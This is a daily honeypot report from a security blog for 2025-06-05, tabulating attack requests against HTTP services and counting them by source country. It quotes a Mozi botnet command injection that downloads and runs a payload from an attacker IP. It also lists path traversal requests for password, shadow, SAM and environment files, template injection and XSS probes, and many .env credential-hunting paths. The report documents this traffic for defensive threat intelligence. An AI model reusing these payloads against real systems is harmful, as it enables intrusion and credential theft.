Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-05

·513 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-05
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 47 new requests that have never been observed before (these were added to the monitored request database.).

A total of 6611 requests were recorded during the day, originating from 1 different countries, with a peak of 5484 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USDubai
USIsrael

botnet_dropper_behaviour
#

remote_addrrequest
117.200.201.56GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.200.201.56:57955/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2632GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/php.ini HTTP/1.1
3102GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1
5752GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Csystem32\x5Cconfig\x5CSAM HTTP/1.1
8832GET /..%2f..%2f..%2f..%2f..%2f..%2fvar/log/nginx/access.log HTTP/1.1
9002GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hostname HTTP/1.1
9482GET /api/teams/1/members HTTP/1.1
10242GET /cgi-bin/luci/ HTTP/1.1
10372GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
11072GET /template?code={{ self }} HTTP/1.1
16152GET /ws-broker?action=PATCH&target=/users/1/settings HTTP/1.1
16982GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hosts HTTP/1.1
17752GET /.idea/workspace.xml HTTP/1.1
18712GET /..%2f..%2f..%2f..%2f..%2f..%2froot/.bash_history HTTP/1.1
23892GET /track?referrer=javascript:alert(document.domain) HTTP/1.1
23932GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow HTTP/1.1
25692GET /..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ HTTP/1.1
26092GET /test/template HTTP/1.1
27812GET /../../boot.ini HTTP/1.1
28042GET /jwt-decode HTTP/1.1
28471GET /.env.bak.2 HTTP/1.1
28781GET /.env-snapshot.tar.gz HTTP/1.1
28921GET /.env-db-credentials HTTP/1.1
28951GET /.env-docker HTTP/1.1
28961GET /.env-nginx HTTP/1.1
28971GET /.env-aws.env HTTP/1.1
28981GET /.env_cookie-settings HTTP/1.1
28991GET /.env-status HTTP/1.1
29001GET /.env-staging-vars HTTP/1.1
29011GET /.env-runner HTTP/1.1
29031GET /.env-reverse-proxy HTTP/1.1
29041GET /.env.job HTTP/1.1
29051GET /.env-copy HTTP/1.1
29201GET /assets/js/config.js HTTP/1.1
29231GET /js/env.js HTTP/1.1
29241GET /static/env.js HTTP/1.1
29331GET /api/admin HTTP/1.1
29341GET /api/dev HTTP/1.1
29481GET /.git/refs HTTP/1.1
29551GET /.env-tracking.log HTTP/1.1
29691GET /.env_secrets HTTP/1.1
29701GET /.env_auth HTTP/1.1
29711GET /.env_config HTTP/1.1
29841GET /config/configuration.yml HTTP/1.1
29851GET /config/databases.yml HTTP/1.1
29871GET /_fragment?_path=what=-1&_controller=phpinfo&_hash=PJKZTykFk9HjPoH4H6ZxRbyJs0b5lS70K1bzuuO1Lg4= HTTP/1.1
29881GET /mailer.ini HTTP/1.1
29951GET /ALFA_DATA/alfacgiapi HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
05484GB
1477US
2221BG
364DE
458JP
546NL
638CA
733CN
821SC
921NG
1020HK
1118PL
1213GH
1312IN
149KR
157PT
167VN
177AO
185FR
195SG
205RU
214CH
224IL
234UA
243ID
253ES
263TW
273KZ
282IT
292BR
302LT
312BE
322TH
332BO
341PA
351SE
361AR
371IE

Related

Report: 2025-06-04
·486 words
Repport Daily
Report: 2025-06-03
·683 words
Repport Daily
Report: 2025-06-02
·353 words
Repport Daily